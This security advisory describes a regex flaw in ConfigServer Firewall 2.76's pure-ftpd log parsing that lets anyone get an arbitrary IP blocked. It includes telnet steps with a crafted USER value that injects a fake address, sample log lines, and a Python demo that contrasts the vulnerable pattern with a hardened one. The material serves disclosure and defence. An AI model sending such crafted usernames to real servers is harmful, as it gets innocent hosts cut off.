CSF 2.76 - remotely block any IP address (pure-ftpd regexp)



DESCRIPTION


ConfigServer Firewall 2.76 provides the option to block brute-force login attempts against various services by having lfd watch the service logs. The regexp in lfd.pl that parses pure-ftpd log lines extracts the offending IP address with an unanchored, greedy pattern, so the address can be taken from the attacker-supplied username instead of from the client address that pure-ftpd logs. This allowed any remote, unauthenticated person to get any IP address of their choice blocked. The code for this looked similar to the following:

    # Vulnerable pattern: the greedy ".*" after "pure-ftpd" lets the engine
    # pick the last "@" on the line that is still followed by
    # "Authentication failed for user", so an "@" inside the logged username
    # is captured as $1 instead of the client's address.
    if ( $log_line =~ /pure-ftpd.*\@(\d+\.\d+\.\d+\.\d+).*Authentication failed for user/ ) {
        return ( 'Unsuccessful FTP login from', $1, 'ftpd' );
    }



IMPACT


Anyone could remotely get any IP address of their choice blocked by attempting to log in to the service with a crafted username. pure-ftpd writes the username verbatim into the failure log line, so the attacker controls part of the text the regexp is applied to.

Given the regexp above, we can attempt to log in to the service with the following username:

pure-ftpd @1.2.3.4 Authentication failed for user


The following steps can be used to take advantage of this issue:

1. telnet x.x.x.x 21

2. Enter the following:

USER pure-ftpd @1.2.3.4 Authentication failed for user
PASS a


This is what a normal ftp authentication failure from /var/log/messages looks like:

Sep  8 20:26:26 host pure-ftpd: (?@1.1.1.1) [WARNING] Authentication failed for user [test]

and this is what the log will look like each time you issue the commands from step 2 shown above:

Sep  8 20:30:02 host pure-ftpd: (?@1.1.1.1) [WARNING] Authentication failed for user [pure-ftpd @1.2.3.4 Authentication failed for user]


Because the greedy match settles on the "@" inside the bracketed username, the regexp captures 1.2.3.4 rather than the real client address 1.1.1.1. Once lfd's failed-login threshold for the ftpd trigger has been reached, the IP address 1.2.3.4 will be blocked, while the attacker's own address is never counted.
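The following is an added example, not code from the advisory or from ConfigServer. It transcribes the lfd.pl 2.76 regexp into Python's re module (the pattern has the same semantics in both engines), runs it over constructed log lines, and places a hardened pattern beside it. The hardened regexp is an assumption of this example, not CSF's actual fix: it anchors on the fixed "pure-ftpd: (login@ip) [WARNING]" prefix that precedes the untrusted username, forbids "@" and ")" inside the login field, and requires the closing ")" directly after the address, so the address can only come from the part of the line pure-ftpd controls. The log lines and the helper names are constructed for the example.

```python
import re

# Constructed log lines (not captured from a real host). All three come from
# the same client, 1.1.1.1; only the bracketed username differs.
GENUINE_FAILURE = (
    "Sep  8 20:26:26 host pure-ftpd: (?@1.1.1.1) [WARNING] "
    "Authentication failed for user [test]"
)
CRAFTED_FAILURE = (
    "Sep  8 20:30:02 host pure-ftpd: (?@1.1.1.1) [WARNING] "
    "Authentication failed for user "
    "[pure-ftpd @1.2.3.4 Authentication failed for user]"
)
# A username that mimics the full pure-ftpd prefix, to exercise the hardened
# pattern against a more determined attacker.
MIMIC_FAILURE = (
    "Sep  8 20:31:10 host pure-ftpd: (?@1.1.1.1) [WARNING] "
    "Authentication failed for user "
    "[pure-ftpd: (x@1.2.3.4) [WARNING] Authentication failed for user [y]]"
)

# The lfd.pl 2.76 pattern, transcribed from Perl. The greedy ".*" after
# "pure-ftpd" lets the engine walk to the last "@" on the line that is still
# followed by "Authentication failed for user", so an "@" inside the
# attacker-controlled username wins over the real client address.
VULNERABLE_RE = re.compile(
    r"pure-ftpd.*\@(\d+\.\d+\.\d+\.\d+).*Authentication failed for user"
)

# Hardened pattern (an assumption here, not CSF's own fix): the address must
# sit inside the "(login@ip)" field that pure-ftpd emits before the username,
# the login field may not contain "@" or ")", and "[WARNING] Authentication
# failed for user [" must follow immediately. re.search returns the leftmost
# match, and the genuine prefix always precedes the username, so a username
# that imitates the prefix cannot displace the real client address.
HARDENED_RE = re.compile(
    r"pure-ftpd: \([^@)]*\@(\d+\.\d+\.\d+\.\d+)\) \[WARNING\] "
    r"Authentication failed for user \["
)


def blocked_ip(line, pattern):
    """Return the IP lfd would count the failure against, or None if no match."""
    m = pattern.search(line)
    return m.group(1) if m else None


def crafted_username(victim_ip):
    """The FTP USER value that makes the vulnerable pattern capture victim_ip."""
    return f"pure-ftpd @{victim_ip} Authentication failed for user"


if __name__ == "__main__":
    lines = (("genuine", GENUINE_FAILURE),
             ("crafted", CRAFTED_FAILURE),
             ("mimic", MIMIC_FAILURE))
    for label, line in lines:
        print(f"{label:8s} vulnerable -> {blocked_ip(line, VULNERABLE_RE)}  "
              f"hardened -> {blocked_ip(line, HARDENED_RE)}")
```

Running the block prints the address each pattern would hand to lfd for each line: the vulnerable pattern reports 1.2.3.4 for the crafted line, while the hardened pattern reports the real client, 1.1.1.1, for all three. The general lesson is the one CSF hit here: when a log parser extracts a value to act on, anchor the pattern on the fields the daemon controls and keep the capture from ever overlapping user-supplied text.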